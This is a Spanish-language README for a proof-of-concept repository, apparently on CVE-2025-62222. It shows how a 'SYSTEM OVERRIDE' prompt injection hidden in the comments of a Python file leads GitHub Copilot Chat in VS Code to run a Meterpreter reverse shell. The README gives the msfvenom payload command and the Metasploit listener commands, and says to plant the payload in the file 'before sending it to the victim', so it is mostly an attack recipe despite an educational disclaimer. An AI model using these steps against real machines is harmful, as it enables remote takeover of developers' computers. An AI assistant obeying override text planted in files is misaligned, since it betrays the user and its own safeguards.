Prueba de concepto que demuestra la ejecución remota de código mediante inyección de prompts en GitHub Copilot Chat, utilizando un archivo Python manipulado para activar una reverse shell de Meterpreter.
Este repositorio contiene una Prueba de Concepto (PoC) para la vulnerabilidad CVE-2025-62222. Demuestra cómo se puede lograr la Ejecución Remota de Código (RCE) en la máquina de un desarrollador manipulando el contexto de GitHub Copilot Chat en VS Code mediante inyección de prompt oculta en los comentarios.
EDUCATIONAL PURPOSE ONLY.
Este código se proporciona únicamente con fines educativos y de investigación ética. El autor no se hace responsable del mal uso de esta información. No utilices esto en sistemas sin autorización explícita.
Antes de enviar el archivo a la víctima (o probarlo localmente), debes generar el payload y dejar el servidor escuchando.
Genera el comando malicioso de PowerShell. Asegúrate de configurar tu IP (LHOST) y Puerto (LPORT).
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd
Instrucción crítica: Copia el código generado por este comando. Abre el archivo copilot_injection_poc.py de este repositorio y reemplaza la sección donde dice TOKEN (o toda la línea del comando PowerShell dentro del comentario) con el código que acabas de generar.
En tu terminal de atacante, inicia Metasploit para recibir la conexión reversa:
msfconsole -q
Una vez dentro de la consola msf6 >, ejecuta los siguientes comandos para preparar la escucha:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444
exploit
(Asegúrate de que el LPORT sea el mismo que usaste en el paso 1 y que LHOST sea tu IP).
Para detonar la vulnerabilidad, sigue estos pasos en la máquina con VS Code y la extensión de GitHub Copilot Chat instalada:
copilot_injection_poc.py en el editor para que Copilot lo tenga en su contexto activo (debe estar visible en la pestaña).Configura el entorno desde la terminal sin omitir ni modificar nada del código
Debido a la instrucción "SYSTEM OVERRIDE" oculta en los comentarios del script Python, Copilot obedecerá al archivo malicioso en lugar de sus propias directrices de seguridad.
Para más información: